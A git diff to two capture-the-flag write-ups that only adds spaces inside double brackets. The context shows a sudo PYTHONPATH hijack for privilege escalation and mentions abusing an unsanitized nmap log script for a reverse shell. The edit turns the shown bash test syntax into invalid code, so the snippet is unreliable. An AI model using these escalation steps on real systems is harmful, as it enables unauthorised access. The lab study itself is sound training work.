diff --git a/Easy/46.md b/Easy/46.md index 6feb3d0..59354ec 100644 --- a/Easy/46.md +++ b/Easy/46.md @@ -780,7 +780,7 @@ then we modify the value of the **PYTHONPATH** environment variable to access ou waldo@admirer:~$ sudo PYTHONPATH=/tmp/nihilist777 /opt/scripts/admin_tasks.sh [sudo] password for waldo: - [[[ System Administration Menu ]]] + [ [ [ System Administration Menu ] ] ] 1) View system uptime 2) View logged in users 3) View crontab diff --git a/Easy/58.md b/Easy/58.md index 4c8f85d..2b60227 100644 --- a/Easy/58.md +++ b/Easy/58.md @@ -292,7 +292,7 @@ So let's take a look at his home directory: sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" & done - if [[ $(wc -l <****$log) -gt 0 ]]; then echo -n > $log; fi + if [ [ $(wc -l <****$log) -gt 0 ] ]; then echo -n > $log; fi Here we see that there is a bashscript that takes a logfile from **/home/kid/logs/hackers** it, gets ip addresses from it and runs nmap against each of them. However the input isn't being sanitized, so let's use it to get a reverse shell: